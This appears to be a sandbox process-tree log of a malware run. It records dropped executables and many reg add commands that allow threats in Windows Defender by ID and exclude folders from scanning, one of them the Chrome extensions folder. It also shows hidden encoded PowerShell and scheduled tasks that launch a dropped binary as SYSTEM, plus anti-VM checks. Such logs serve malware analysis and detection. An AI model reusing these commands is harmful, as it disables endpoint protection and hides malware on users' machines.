- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4624
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:3728
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:4432

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3176

C:\ProgramData\voha\moqpq.exe
C:\ProgramData\voha\moqpq.exe start2
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2696

C:\Users\Admin\AppData\Local\Temp\7zS49B6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS49B6.tmp\Install.exe it /qYXdidTxeY 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:2180
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5912
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6048
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5920
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5296
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5872
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5332
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5560
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4664
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6040
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6136
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6068
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4028
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:3728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2368
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3728
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:392
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6128
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5992
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gVIWEKoUT" /SC once /ST 17:41:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gVIWEKoUT"
  2⤵
  PID:6024
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gVIWEKoUT"
  2⤵
  PID:5280
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 21:53:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HGRrgVR.exe\" GH /Ubmpdidri 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1968
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:1276
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5984

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
